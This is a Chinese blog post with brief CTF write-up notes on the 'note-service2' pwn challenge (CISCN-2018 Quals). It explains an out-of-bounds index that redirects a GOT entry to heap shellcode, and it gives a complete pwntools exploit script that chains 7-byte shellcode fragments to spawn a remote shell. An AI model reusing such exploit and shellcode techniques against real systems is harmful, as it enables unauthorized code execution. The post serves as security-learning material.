攻防世界note-service2

最新推荐文章于 2022-09-01 21:18:49 发布
最新推荐文章于 2022-09-01 21:18:49 发布
阅读量682 收藏
点赞数 1
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43935969/article/details/104417430
版权

ps:不是一个完整的write-up,只是标了一下重点方便自己以后看看。。。

来源:CISCN-2018-Quals

参考:

1.https://blog.csdn.net/qq_42728977/article/details/103914342

2.https://blog.csdn.net/seaaseesa/article/details/103003167

 

是一个数组越界的漏洞,而且可以堆栈执行shell。所以大致思路为申请一些堆块并写入shllcode,然后将某一个函数的got表修指向堆块shell,调用该函数运行shellcode,进而获得shell。理想很丰满,现实很骨感。
那么问题来了,shellcode怎么写?每个堆块的data区只能写7个字节,太短了(滑稽),怎么处理?shellcode怎么写?原理是啥?

 

 

 

#coding=utf-8
from pwn import *
context.log_level='debug'
context.update(arch='amd64')#64位
#io=process("./note")
io=remote("111.198.29.45",59605)

#利用函数的一般写法
#收到,发送(参数)
def add(index,content):
    io.recvuntil("your choice>>")
    io.sendline("1")
    io.recvuntil("index:")
    io.sendline(str(index))
    io.recvuntil("size:")
    io.sendline("8")  #全部申请为最大堆块8字节
    io.recvuntil("content:")
    io.sendline(content)
def dele(index):
    io.recvuntil("your choice>>")
    io.sendline("4")
    io.recvuntil("index:")
    io.sendline(str(index))

add(0,"/bin/sh")
add(-17,asm("xor rsi,rsi")+"\x90\x90\xeb\x19") #0x90即nop ;EB即 jmp short
add(1,asm("mov eax, 0x3b")+"\xeb\x19")
add(2,asm("xor rdx, rdx")+"\x90\x90\xeb\x19")
add(3,asm("syscall").ljust(7,"\x90"))
dele(0)

io.interactive()

查看任意一条汇编指令的机器码做法:

打开kali终端

python

from pwn import *

enhex(asm("汇编代码"))

 

arch设置架构为amd64,可以简单的认为设置为64位的模式

context(os='linux', arch='amd64', log_level='debug')

 

 

 

书文的学习记录本
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
【PWN系列】攻防世界 pwn note-service2题目分析
Vicl1fe的博客
10-21 464
主要题解:https://blog.csdn.net/seaaseesa/article/details/103003167 这篇文章写已经是不错的了,这里主要写一下我对上面那篇文章的理解 1、以下code0到code3的长度都是七个字节。不足七个字节的用\x90填充。90机器码所代表的汇编指令是nop。因为我们跳转的时候用的是相对偏移跳转,所以必须要填充为七个字节,否则偏移要重新计算了。 code0 = (asm('xor rax,rax') + '\x90\x90\xeb\x19') #rax =
[攻防世界]noteservice2
m0_55906008的博客
01-15 278
一道基本的堆题
攻防世界进阶题note_service2: 堆区第一题!
weixin_48066554的博客
03-16 336
note_service: 堆区第一题! 拿到题目,按惯例checksec: 发现开了PIE和Canary,这意味着我们不能愉快地ret2text了,有点难受,但是没开NX,那不就ret 2 system call 一把梭哈了吗 丢到ida里看一下(为方便阅读,已将部分函数名、变量名进行了更改): 反汇编 1、程序主体 void choice() { while ( 1 ) { menu(); printf("your choice>> "); switch (
攻防世界PWN之note-service2题解
seaaseesa的博客
11-10 2774
note-service2 首先看一下程序的保护机制,注意,PIE是开启的,这个checksec检测PIE有时候不准确。不过,我们看到NX是关闭的,说明堆栈的数据可以被当做指令执行 然后,我们用IDA分析一下,发现是一个很简单程序,并且只有添加和删除功能,其他功能未实现 创建这里,有三处值得我们注意 创建的堆空间大小最多为8字节 保存堆指针的数组下标可以越界 既然数组下...
repeater【攻防世界
qq_41696518的博客
09-01 1603
repeater 攻防世界
XCTF note-service2
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-09 857
查程序保护机制 开启了PIE和CANARRY 没有开启NX,堆栈具有可执行权限 IDA64载入程序,查看main函数 重点分析sub_E30(); 经过分析得知sub_C56()是一个输出提示信息的函数,sub_B91()是获取用户输入值的函数 sub_DC1();sub_DD4();这两个函数的功能未完成 仅实现了sub_CA5();sub_DE7();这两个函数,这两个函数实现了添加和删...
攻防世界Training-Stegano-1
10-31
【标题】"攻防世界Training-Stegano-1" 是一个关于信息安全领域的训练题目,主要涉及的是隐写术(Steganography)技术。隐写术是一种隐藏信息的技术,通常用于在图像、音频或文本中嵌入秘密数据,使得非授权者无法...
攻防世界Erik-Baleog-and-Olaf
10-31
攻防世界Erik-Baleog-and-Olaf,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127615829
攻防世界nice-bgm杂项
11-20
在网络安全领域,"攻防世界"是一个广受欢迎的在线平台,提供各种安全挑战,帮助学习者提升他们的黑客防御和攻击技能。"nice-bgm杂项"是其中的一个挑战,属于"misc"类别,这意味着它可能涉及到多种不同类型的解题技巧...
攻防世界1-misc杂项
11-20
攻防世界1-misc杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127947726
攻防世界hit-the-core,杂项misc
11-01
攻防世界hit-the-core,杂项misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127626829
KangkangNote.zip
05-15
Android记事本NotePad应用功能拓展:(C币防伸手党) 原文留邮箱发送。 原文地址:https://mp.csdn.net/console/editor/html/106132979 1.NoteList中显示条目增加时间戳显示。 2.添加笔记查询功能(根据标题查询) 3.设置功能(初步实现) 4.优化删除功能
攻防世界pwn之note-service
qq_42728977的博客
01-09 834
写在前面:最近在准备期末考试,姑且是这个理由吧,pwn和re都停了一个月了,感觉自己不够持之以恒,本来说还得一天一道题,给搁置了一个多月了,pwn和re这东西,不进则退,搞得我很难受,本来想的是,这个学期有点成绩,但是现在看来才是刚入门,而且还要复习考研,时间和精力会更少。喜欢pwn和re是因为自己很喜欢从原理搞清楚一个事情。不多啰嗦了,开始写wp了。 题目:note-service 原题是CIS...
堆指针越界&堆上布置shellcode|攻防世界pwn进阶区 note-service2
Kni9hT's Blog
03-18 593
文章目录前言思路分析0x00.检查保护机制0x01.查看程序功能0x02.ida查看逻辑0x03.利用思路利用过程0x00.选一段shellcode布置在堆上0x01.计算jmp short指令要跳多少字节0x02.shellcode转换为asm格式0x03.通过64位传参机制把&("/bin/sh")传到rdi0x04.计算free的got地址和堆数组静态地址的距离0x05. 尝试写ex...
note-service2(xctf)
weixin_43868725的博客
08-08 525
0x0 程序保护和流程 保护: 流程: main() real_main() 选择1可以新建一个note,选择2和3没有实现,选择4可以删除note,选择5可以退出程序。但是在选择1的时候没有对数组的边界进行考虑。 0x1 利用过程 1.虽然这个程序也存在UAF漏洞但是由于输出和修改功能没有实现所以能利用的角度基本没有,但是数组越界可以任意地址写。 2.可以发现相对于数组的低地址处有**.got.plt表,并且.got.plt表是有读写权限的。所以可以修改.got.plt**表 可以得到偏移就是
CTF-PWN-note-service2 (堆中shellcode执行)
SuperGate的博客
11-18 553
checksec Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX disabled PIE: PIE enabled RWX: Has RWX segments 发现没有开启NX,因此很有可能是要我们将sh...
CISCN PWN签到题 task_note_service
Bill
05-02 1646
序言 比赛中这道差那么一点点就做出来了 程序运行 1.menu ---------menu--------- 1. add note 2. show note 3. edit note 4. del note 5. exit your choice>> 2. add 1. add note 2. show note 3. edit note 4. del...
CISCN-2018-Quals note-service2
qq_41071646的博客
07-23 963
这几天看 wiki 有点头疼 刷会 攻防世界 (那个echo_back 真的头疼 那个 文件结构 不知道是怎么搞出来的) 哪一行代码也不是很清楚是怎么做的 于是就直接跳过那个题目了 note-service2 这个题用ida 分析的时候 看见 show 不能用 笑容 逐渐 凝固 看见edit 不能用的时候 直接关闭了ida 然后发现保护如下 shellcode 一把梭鸭 ...
攻防世界PWN之Supermarket题解
seaaseesa的博客
11-15 2258
Supermarket 首先,看一下程序的保护机制。看起来还不错 然后,我们用IDA分析一下 分析出程序大概有这样的一个结构体 typedefstructNode{ charname[16]; intprice; intdescription_size; char*description; }Node;...
攻防世界ics-06
最新发布
08-12
result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [攻防世界Web “ics-06、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

书文的学习记录本

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值